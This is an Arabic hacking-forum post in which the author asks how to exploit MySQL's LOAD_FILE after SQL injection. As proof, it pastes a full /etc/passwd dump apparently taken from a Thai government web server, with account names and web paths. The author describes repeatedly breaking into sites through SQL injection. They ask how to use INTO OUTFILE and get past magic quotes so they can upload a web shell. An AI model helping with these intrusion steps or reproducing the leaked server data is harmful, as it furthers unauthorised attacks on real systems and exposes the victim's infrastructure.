كيف الاستفادة من امر LOAD_FILE('\')

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

كيفكم شباب ان شاء الله بخير


ندخل في الموضوع اعتقد الموضوع واضح


كيف استفيد من الامر load_file('\')

مثلا عند اخراج مثل هذه المعلومات بالامر

/etc/password

root:x:0:0:root:/root:/bin/bash daemon:x1:daemon:/usr/sbin:/bin/sh bin:x2:bin:/bin:/bin/sh sys:x3:sys:/dev:/bin/sh sync:x65534:sync:/bin:/bin/sync games:x60:games:/usr/games:/bin/sh man:x12:man:/var/cache/man:/bin/sh lp:x7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin eodi:x:1000:1000:eodi,,,:/home/eodi:/bin/bash ting:x:1001:1001:ting eodi,,,:/home/ting:/bin/bash mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false adminopdc:x:1002:1002:adminopdc,,,:/home/adminopdc:/bin/bash proftpd:x:106:65534::/var/run/proftpd:/bin/false ftp:x:107:65534::/home/ftp:/bin/false opdcmoi:x:1017:100:opdcmoi:/data/www/www.opdc.go.th/moi:/bin/sh goodpractice:x:1014:100:goodpractice:/data/www/www.opdc.go.th/goodpracticemodel:/bin/sh websiteopdc:x:1012:100:websiteopdc:/data/www/www.opdc.go.th:/bin/sh gcs:x:1010:100:gcs:/data/www/www.opdc.go.th/gcs:/bin/sh tkhpo:x:1009:100:tkhpo:/data/www/www.opdc.go.th/tkhpo:/bin/sh km:x:1008:100:km:/data/www/km.opdc.go.th:/bin/sh webmaster:x:1007:100:webmaster:/data/www/www.opdc.go.th:/bin/sh incentives50:x:1000:100:incentives50:/data/www/www.opdc.go.th/incentives50:/bin/sh munin:x:108:115::/var/lib/munin:/bin/false clamav:x:109:116::/var/lib/clamav:/bin/false postfix:x:110:118::/var/spool/postfix:/bin/false test:x:1003:100:test,test,,:/home/test:/bin/bash moiftp:x:1005:100:moiftp,,,:/data/www/moi.opdc.go.th:/bin/sh tkhpoftp:x:1006:100:tkhpoftp,,,:/data/www/tkhpo.opdc.go.th:/bin/sh gcsftp:x:1004:100:gcsftp,,,:/data/www/gcs.opdc.go.th/:/bin/sh incentives:x:1011:100:incentives,,,:/data/www/incentives.opdc.go.th:/bin/sh osmftp:x:1013:100:osm,,,:/data/www/osm.opdc.go.th:/bin/sh



وفي امر ثاني مجنني كلما اخترق موقع بثغرة SQL مااستفيد منه اي شي لان لا استطيع رفع الشل

وفي موضوع يقول لفولوكانو الى يضع مكان للابلود في الصفحة مافهمت منه اي شي واطبق مع لاكن بدون

فائدة وفي طريقة ثانية ايضا الي يقول into_file هيك شي لاكن المشكلة يقول لازم الماجك كوتس اوف

بس اليمحيرني الماجك كوتس يتخطى بالتشفير لاكن لماذا هذا لايتخطى انا قصدي موضوع حسين اكس

وارجو ان القا الاجابات المفرحة باذن الله وشكرا